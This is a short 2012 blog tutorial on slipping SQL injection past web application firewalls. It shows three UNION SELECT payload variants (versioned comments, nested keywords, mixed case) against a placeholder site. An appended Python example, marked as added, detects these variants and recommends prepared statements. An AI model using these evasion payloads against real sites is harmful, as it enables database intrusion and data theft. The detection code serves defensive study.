14 Apr 2012

How to Bypass HTTP Forbidden & HTTP Not Acceptable in SQL Injection


SQL WAF :- A "WAF" is a Web Application Firewall, which protects the site from malicious scripts that an attacker injects into the victim's site. It doesn't allow the scripts to execute and shows the error "HTTP FORBIDDEN" or "HTTP NOT ACCEPTABLE".

So today we will learn how to bypass WAF :-

By adding special characters to the query :-

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5--

Bypass query :- www.vulnerable-site.com/index.php?id=-12 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--

Second way to bypass it :-

By writing the keyword in capital letters at the start and end, with a lowercase copy of it in the middle :-

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5--

Bypass query :- www.vulnerable-site.com/index.php?id=-12 UNIunionON SEselectLECT 1,2,3,4,5--

Third Way to bypass it :-

By mixing capital and small letters in the query :-

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5--

Bypass query :- http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5--
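
Why the three bypass queries above get past a simple keyword filter, and a rule that still catches them, as an added Python example that is not part of the original post. The names `naive_rule`, `strip_once` and `hardened_rule` are hypothetical; `strip_once` stands in for an assumed legacy sanitizer that deletes keywords in a single pass, and the samples are the `id` values of the bypass queries above.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the id values from the three bypass queries on this page.
SAMPLES = {
    "comment": "-12 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--",
    "nested": "-12 UNIunionON SEselectLECT 1,2,3,4,5--",
    "mixed_case": "-1 uNiOn SeLeCt 1,2,3,4,5--",
}

UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")

def naive_rule(value: str) -> bool:
    """Weak filter: exact, case-sensitive match on the raw parameter."""
    return "UNION SELECT" in value

def strip_once(value: str) -> str:
    """Hypothetical legacy sanitizer: deletes keywords in one pass only."""
    return re.sub(r"union|select", "", value, flags=re.I)

def canonicalize(value: str) -> str:
    """Reduce the value to the form the MySQL parser would act on."""
    value = unquote_plus(value)  # '+' and %xx become real characters
    # MySQL executes the body of /*! ... */ (optionally /*!50000 ... */): keep it.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Ordinary comments behave like whitespace between tokens.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def hardened_rule(value: str) -> bool:
    """Match the canonical form of the input and of what the sanitizer emits."""
    candidates = (value, strip_once(value))
    return any(UNION_SELECT.search(canonicalize(v)) for v in candidates)

def report() -> dict:
    """Map each sample to (naive_rule result, hardened_rule result)."""
    return {name: (naive_rule(v), hardened_rule(v)) for name, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in report().items():
        print(f"{name:11} naive={naive!s:5} hardened={hardened}")
```

Because `id` is numeric on this page, binding it as an integer parameter in a prepared statement removes the injection whether or not a filter catches the request.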

Hope you loved the tutorial on how to bypass a WAF ;)
